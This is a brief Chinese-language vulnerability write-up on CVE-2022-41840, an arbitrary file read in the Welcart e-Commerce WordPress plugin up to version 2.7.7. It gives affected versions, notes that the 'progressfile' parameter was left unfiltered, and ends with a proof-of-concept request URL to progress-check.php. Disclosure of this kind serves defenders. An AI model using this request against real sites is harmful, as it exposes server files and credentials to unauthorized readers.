WordPress Welcart e-Commerce progress-check.php 任意文件读取漏洞 CVE-2022-41840

漏洞描述

WordPress Welcart e-Commerce 插件 progress-check.php文件中，存在任意文件读取漏洞，攻击者痛过漏洞可以获取服务器中的任意文件信息

漏洞影响

WordPress Welcart e-Commerce <= 2.7.7

插件名

Welcart e-Commerce

https://downloads.wordpress.org/plugin/usc-e-shop.2.7.7.zip

漏洞复现

下载后对比更新的文件 usc-e-shop/functions/progress-check.php

修复了参数 progressfile 过滤问题导致的任意文件读取漏洞，验证POC

/wp-content/plugins/usc-e-shop/functions/progress-check.php?progressfile=progress-check.php